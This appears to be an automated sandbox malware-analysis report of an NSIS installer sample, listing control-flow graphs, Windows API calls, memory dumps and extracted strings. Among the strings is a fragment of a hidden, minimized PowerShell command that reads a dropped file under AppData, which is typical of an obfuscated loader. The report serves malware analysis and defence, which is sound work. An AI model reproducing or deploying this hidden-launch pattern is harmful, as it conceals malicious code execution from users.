KiUserCallbackDispatcher call 404008 EnableWindow 280->308 309 403dae-403db3 280->309 285 403c17-403c1c call 403fbf 281->285 286 403bfa-403bff 282->286 287 403bee-403bf4 282->287 285->275 289 403c35-403c48 SendMessageW 286->289 291 403c01-403c07 286->291 287->289 290 403bf6-403bf8 287->290 289->275 290->285 294 403c09-403c0f call 40140b 291->294 295 403c1e-403c27 call 40140b 291->295 306 403c15 294->306 295->275 304 403c29-403c33 295->304 304->306 306->285 312 403df4-403df5 308->312 313 403df7 308->313 309->308 314 403df9-403e27 GetSystemMenu EnableMenuItem SendMessageW 312->314 313->314 315 403e29-403e3a SendMessageW 314->315 316 403e3c 314->316 317 403e42-403e80 call 40401b call 405da1 lstrlenW call 405dc3 SetWindowTextW call 401389 315->317 316->317 317->257 326 403e86-403e88 317->326 326->257 327 403e8e-403e92 326->327 328 403eb1-403ec5 DestroyWindow 327->328 329 403e94-403e9a 327->329 328->265 331 403ecb-403ef8 CreateDialogParamW 328->331 329->256 330 403ea0-403ea6 329->330 330->257 332 403eac 330->332 331->265 333 403efe-403f55 call 403fe6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 331->333 332->256 333->256 338 403f57-403f6a ShowWindow call 404032 333->338 340 403f6f 338->340 340->265
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B4A
                                                                  • ShowWindow.USER32(?), ref: 00403B67
                                                                  • DestroyWindow.USER32 ref: 00403B7B
                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403B97
                                                                  • GetDlgItem.USER32(?,?), ref: 00403BB8
                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403BCC
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403BD3
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403C81
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403C8B
                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403CA5
                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403CF6
                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403D9C
                                                                  • ShowWindow.USER32(00000000,?), ref: 00403DBD
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DCF
                                                                  • EnableWindow.USER32(?,?), ref: 00403DEA
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E00
                                                                  • EnableMenuItem.USER32(00000000), ref: 00403E07
                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403E1F
                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403E32
                                                                  • lstrlenW.KERNEL32(0042D1F8,?,0042D1F8,00433EA0), ref: 00403E5B
                                                                  • SetWindowTextW.USER32(?,0042D1F8), ref: 00403E6F
                                                                  • ShowWindow.USER32(?,0000000A), ref: 00403FA3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                  • String ID:
                                                                  • API String ID: 3282139019-0
                                                                  • Opcode ID: faeace5642cdda3558d84447fe0703c4348c0d149e23cdb61c619dc2470e19a1
                                                                  • Instruction ID: 60ca7c1d91bee6f8242d2bed331db898ad50b25bc51b1c46c45c1ad212b6c09a
                                                                  • Opcode Fuzzy Hash: faeace5642cdda3558d84447fe0703c4348c0d149e23cdb61c619dc2470e19a1
                                                                  • Instruction Fuzzy Hash: B6C1DD71904205ABDB216F61EE86E2A3E7CFB4570AF14053EF641B11E0CB799A42DB2D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 341 402d67-402db5 GetTickCount GetModuleFileNameW call 405a0d 344 402dc1-402def call 405da1 call 405838 call 405da1 GetFileSize 341->344 345 402db7-402dbc 341->345 353 402df5 344->353 354 402edc-402eea call 402d03 344->354 346 402f99-402f9d 345->346 356 402dfa-402e11 353->356 360 402eec-402eef 354->360 361 402f3f-402f44 354->361 358 402e13 356->358 359 402e15-402e1e call 4031c8 356->359 358->359 368 402e24-402e2b 359->368 369 402f46-402f4e call 402d03 359->369 363 402ef1-402f09 call 4031de call 4031c8 360->363 364 402f13-402f3d GlobalAlloc call 4031de call 402fa0 360->364 361->346 363->361 391 402f0b-402f11 363->391 364->361 390 402f50-402f61 364->390 373 402ea7-402eab 368->373 374 402e2d-402e41 call 4059c8 368->374 369->361 379 402eb5-402ebb 373->379 380 402ead-402eb4 call 402d03 373->380 374->379 388 402e43-402e4a 374->388 381 402eca-402ed4 379->381 382 402ebd-402ec7 call 4061b9 379->382 380->379 381->356 389 402eda 381->389 382->381 388->379 394 402e4c-402e53 388->394 389->354 395 402f63 390->395 396 402f69-402f6e 390->396 391->361 391->364 394->379 397 402e55-402e5c 394->397 395->396 398 402f6f-402f75 396->398 397->379 399 402e5e-402e65 397->399 398->398 400 402f77-402f92 SetFilePointer call 4059c8 398->400 399->379 401 402e67-402e87 399->401 404 402f97 400->404 401->361 403 402e8d-402e91 401->403 405 402e93-402e97 403->405 406 402e99-402ea1 403->406 404->346 405->389 405->406 406->379 407 402ea3-402ea5 406->407 407->379
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00402D78
                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\yMXFgPOdf2.exe,00000400,?,?,?,00000000,0040344F,?), ref: 00402D94
                                                                    • Part of subcall function 00405A0D: GetFileAttributesW.KERNELBASE(00000003,00402DA7,C:\Users\user\Desktop\yMXFgPOdf2.exe,80000000,00000003,?,?,?,00000000,0040344F,?), ref: 00405A11
                                                                    • Part of subcall function 00405A0D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,0040344F,?), ref: 00405A33
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\yMXFgPOdf2.exe,C:\Users\user\Desktop\yMXFgPOdf2.exe,80000000,00000003,?,?,?,00000000,0040344F,?), ref: 00402DE0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                  • String ID: "C:\Users\user\Desktop\yMXFgPOdf2.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\yMXFgPOdf2.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                  • API String ID: 4283519449-3259269171
                                                                  • Opcode ID: 2e3c47bfa60127b1afce542dec9d1826138b9062359befd6d0ef1f45db9145ec
                                                                  • Instruction ID: 2344981239cccc2d9a157a4bc97fadfb01f0662fe41213100d9ed930206fcb3f
                                                                  • Opcode Fuzzy Hash: 2e3c47bfa60127b1afce542dec9d1826138b9062359befd6d0ef1f45db9145ec
                                                                  • Instruction Fuzzy Hash: 2451D171900215AFDB109FA5DE89B9F7AB8FB04359F20413BF904B62D1C7B89D408BAD

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 534 401752-401777 call 402b38 call 405863 539 401781-401793 call 405da1 call 4057ec lstrcatW 534->539 540 401779-40177f call 405da1 534->540 545 401798-401799 call 406035 539->545 540->545 549 40179e-4017a2 545->549 550 4017a4-4017ae call 4060e4 549->550 551 4017d5-4017d8 549->551 558 4017c0-4017d2 550->558 559 4017b0-4017be CompareFileTime 550->559 553 4017e0-4017fc call 405a0d 551->553 554 4017da-4017db call 4059e8 551->554 561 401870-401899 call 40504b call 402fa0 553->561 562 4017fe-401801 553->562 554->553 558->551 559->558 575 4018a1-4018ad SetFileTime 561->575 576 40189b-40189f 561->576 564 401852-40185c call 40504b 562->564 565 401803-401841 call 405da1 * 2 call 405dc3 call 405da1 call 40557d 562->565 577 401865-40186b 564->577 565->549 597 401847-401848 565->597 580 4018b3-4018be CloseHandle 575->580 576->575 576->580 578 4029ce 577->578 581 4029d0-4029d4 578->581 583 4018c4-4018c7 580->583 584 4029c5-4029c8 580->584 586 4018c9-4018da call 405dc3 lstrcatW 583->586 587 4018dc-4018df call 405dc3 583->587 584->578 593 4018e4-402241 call 40557d 586->593 587->593 593->581 593->584 597->577 599 40184a-40184b 597->599 599->564
                                                                  APIs
                                                                  • lstrcatW.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\bre,C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens,?,?,00000031), ref: 00401793
                                                                  • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\bre,"powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\bre,00000000,00000000,"powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\bre,C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens,?,?,00000031), ref: 004017B8
                                                                    • Part of subcall function 00405DA1: lstrcpynW.KERNEL32(?,?,00000400,00403297,00433EA0,NSIS Error), ref: 00405DAE
                                                                    • Part of subcall function 0040504B: lstrlenW.KERNEL32(Completed,00000000,0041BB2D,756F23A0,?,?,?,?,?,?,?,?,?,00403103,00000000,?), ref: 00405083
                                                                    • Part of subcall function 0040504B: lstrlenW.KERNEL32(00403103,Completed,00000000,0041BB2D,756F23A0,?,?,?,?,?,?,?,?,?,00403103,00000000), ref: 00405093
                                                                    • Part of subcall function 0040504B: lstrcatW.KERNEL32(Completed,00403103,00403103,Completed,00000000,0041BB2D,756F23A0), ref: 004050A6
                                                                    • Part of subcall function 0040504B: SetWindowTextW.USER32(Completed,Completed), ref: 004050B8
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050DE
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050F8
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405106
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                  • String ID: "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\bre$C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens$C:\Windows\resources\0809\spaciousness\krjning.dll
                                                                  • API String ID: 1941528284-2024239508
                                                                  • Opcode ID: a136ea5669a7d7d0161c1cd16082336334043ff9ed154f659fcf1137da06a460
                                                                  • Instruction ID: e0c9a0707421b0566b50a086881e387c24033da95965c7c775ca149cf8f14c82
                                                                  • Opcode Fuzzy Hash: a136ea5669a7d7d0161c1cd16082336334043ff9ed154f659fcf1137da06a460
                                                                  • Instruction Fuzzy Hash: EA418071900518BACF116BB5DC4ADAF7679EF45368B20823BF421B10E1D73C8A519A6D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 600 40504b-405060 601 405066-405077 600->601 602 405117-40511b 600->602 603 405082-40508e lstrlenW 601->603 604 405079-40507d call 405dc3 601->604 606 405090-4050a0 lstrlenW 603->606 607 4050ab-4050af 603->607 604->603 606->602 610 4050a2-4050a6 lstrcatW 606->610 608 4050b1-4050b8 SetWindowTextW 607->608 609 4050be-4050c2 607->609 608->609 611 4050c4-405106 SendMessageW * 3 609->611 612 405108-40510a 609->612 610->607 611->612 612->602 613 40510c-40510f 612->613 613->602
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(Completed,00000000,0041BB2D,756F23A0,?,?,?,?,?,?,?,?,?,00403103,00000000,?), ref: 00405083
                                                                  • lstrlenW.KERNEL32(00403103,Completed,00000000,0041BB2D,756F23A0,?,?,?,?,?,?,?,?,?,00403103,00000000), ref: 00405093
                                                                  • lstrcatW.KERNEL32(Completed,00403103,00403103,Completed,00000000,0041BB2D,756F23A0), ref: 004050A6
                                                                  • SetWindowTextW.USER32(Completed,Completed), ref: 004050B8
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050DE
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050F8
                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405106
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID: Completed
                                                                  • API String ID: 2531174081-3087654605
                                                                  • Opcode ID: de5bbd2ec47a5afdc2151420ab1ec2db132e359724651f026e52d768b98c2cc9
                                                                  • Instruction ID: 18f0b212c8a37fbfd9ea408b4b1fd2a272b642164fc692df639cd20d24458be7
                                                                  • Opcode Fuzzy Hash: de5bbd2ec47a5afdc2151420ab1ec2db132e359724651f026e52d768b98c2cc9
                                                                  • Instruction Fuzzy Hash: 56219D71900518BADB11AF95DD85EDFBFB9EF84314F10807AF904B62A1C3794A40CFA8

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 614 402fa0-402fb9 615 402fc2-402fca 614->615 616 402fbb 614->616 617 402fd3-402fd8 615->617 618 402fcc 615->618 616->615 619 402fe8-402ff5 call 4031c8 617->619 620 402fda-402fe3 call 4031de 617->620 618->617 624 403175 619->624 625 402ffb-402fff 619->625 620->619 628 403177-403178 624->628 626 403005-40304c GetTickCount 625->626 627 40315e-403160 625->627 631 403052-40305a 626->631 632 4031be 626->632 629 403162-403165 627->629 630 4031b4-4031b7 627->630 633 4031c1-4031c5 628->633 636 403167 629->636 637 40316a-403173 call 4031c8 629->637 634 4031b9 630->634 635 40317a-403180 630->635 638 40305c 631->638 639 40305f-40306d call 4031c8 631->639 632->633 634->632 642 403182 635->642 643 403185-403193 call 4031c8 635->643 636->637 637->624 647 4031bb 637->647 638->639 639->624 648 403073-40307c 639->648 642->643 643->624 651 403195-4031a7 WriteFile 643->651 647->632 650 403082-4030a2 call 406227 648->650 657 403156-403158 650->657 658 4030a8-4030bb GetTickCount 650->658 653 4031a9-4031ac 651->653 654 40315a-40315c 651->654 653->654 656 4031ae-4031b1 653->656 654->628 656->630 657->628 659 403106-40310a 658->659 660 4030bd-4030c5 658->660 663 40314b-40314e 659->663 664 40310c-40310f 659->664 661 4030c7-4030cb 660->661 662 4030cd-4030fe MulDiv wsprintfW call 40504b 660->662 661->659 661->662 669 403103 662->669 663->631 668 403154 663->668 666 403131-40313c 664->666 667 403111-403125 WriteFile 664->667 671 40313f-403143 666->671 667->654 670 403127-40312a 667->670 668->632 669->659 670->654 672 40312c-40312f 670->672 671->650 673 403149 671->673 672->671 673->632
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 0040300B
                                                                  • GetTickCount.KERNEL32 ref: 004030B0
                                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004030D9
                                                                  • wsprintfW.USER32 ref: 004030EC
                                                                  • WriteFile.KERNELBASE(00000000,00000000,0041BB2D,00402F3A,00000000), ref: 0040311D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$FileWritewsprintf
                                                                  • String ID: ... %d%%
                                                                  • API String ID: 4209647438-2449383134
                                                                  • Opcode ID: 567d16c84bc26e35b56de6a991f7c1d851492a15168b7d80d9f2dbebfc4257a8
                                                                  • Instruction ID: edebebcb9cc5efd3ffb8aa1a5e3cca2c022cdf8913c1b450003ecc800609919e
                                                                  • Opcode Fuzzy Hash: 567d16c84bc26e35b56de6a991f7c1d851492a15168b7d80d9f2dbebfc4257a8
                                                                  • Instruction Fuzzy Hash: 78615971900219EBCF10DF65DA84A9F7FB8AF08312F14457BE814BB2D0D7789A50CBA9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 674 4015b9-4015cd call 402b38 call 405897 679 401614-401617 674->679 680 4015cf-4015eb call 405819 CreateDirectoryW 674->680 681 401646-402195 call 401423 679->681 682 401619-401638 call 401423 call 405da1 SetCurrentDirectoryW 679->682 689 40160a-401612 680->689 690 4015ed-4015f8 GetLastError 680->690 695 402791-402798 681->695 696 4029c5-4029d4 681->696 682->696 699 40163e-401641 682->699 689->679 689->680 693 401607 690->693 694 4015fa-401605 GetFileAttributesW 690->694 693->689 694->689 694->693 695->696 699->696
                                                                  APIs
                                                                    • Part of subcall function 00405897: CharNextW.USER32(?,?,0042FA00,?,0040590B,0042FA00,0042FA00,?,?,756F3420,00405649,?,C:\Users\user\AppData\Local\Temp\,756F3420,"C:\Users\user\Desktop\yMXFgPOdf2.exe"), ref: 004058A5
                                                                    • Part of subcall function 00405897: CharNextW.USER32(00000000), ref: 004058AA
                                                                    • Part of subcall function 00405897: CharNextW.USER32(00000000), ref: 004058C2
                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens,?,00000000,000000F0), ref: 00401630
                                                                  Strings
                                                                  • C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens, xrefs: 00401623
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                  • String ID: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens
                                                                  • API String ID: 3751793516-1930900407
                                                                  • Opcode ID: c2e53e3a24d067e97163a32991b035f442807ac6a43d4a55699688dd9d396094
                                                                  • Instruction ID: 34d8f352ef9aa8656828f895e526d2bd4293bf172d5861d5c75f43cad8b5630e
                                                                  • Opcode Fuzzy Hash: c2e53e3a24d067e97163a32991b035f442807ac6a43d4a55699688dd9d396094
                                                                  • Instruction Fuzzy Hash: B2112531500104EBCF206FA0DD449AE3BB0EF05369B29453BF881F22E0D73D49808B5D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 701 401f98-401fa4 702 402063-402065 701->702 703 401faa-401fc0 call 402b38 * 2 701->703 704 402190-402195 call 401423 702->704 713 401fd0-401fdf LoadLibraryExW 703->713 714 401fc2-401fce GetModuleHandleW 703->714 710 402791-402798 704->710 711 4029c5-4029d4 704->711 710->711 716 401fe1-401ff0 call 406177 713->716 717 40205c-40205e 713->717 714->713 714->716 721 401ff2-401ff8 716->721 722 40202b-402030 call 40504b 716->722 717->704 724 402011-402029 721->724 725 401ffa-402006 call 401423 721->725 726 402035-402038 722->726 724->726 725->726 735 402008-40200f 725->735 726->711 728 40203e-402048 call 40370b 726->728 728->711 734 40204e-402057 FreeLibrary 728->734 734->711 735->726
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FC3
                                                                    • Part of subcall function 0040504B: lstrlenW.KERNEL32(Completed,00000000,0041BB2D,756F23A0,?,?,?,?,?,?,?,?,?,00403103,00000000,?), ref: 00405083
                                                                    • Part of subcall function 0040504B: lstrlenW.KERNEL32(00403103,Completed,00000000,0041BB2D,756F23A0,?,?,?,?,?,?,?,?,?,00403103,00000000), ref: 00405093
                                                                    • Part of subcall function 0040504B: lstrcatW.KERNEL32(Completed,00403103,00403103,Completed,00000000,0041BB2D,756F23A0), ref: 004050A6
                                                                    • Part of subcall function 0040504B: SetWindowTextW.USER32(Completed,Completed), ref: 004050B8
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050DE
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050F8
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405106
                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                  • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1396396509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1396313274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396428135.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1396581375.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
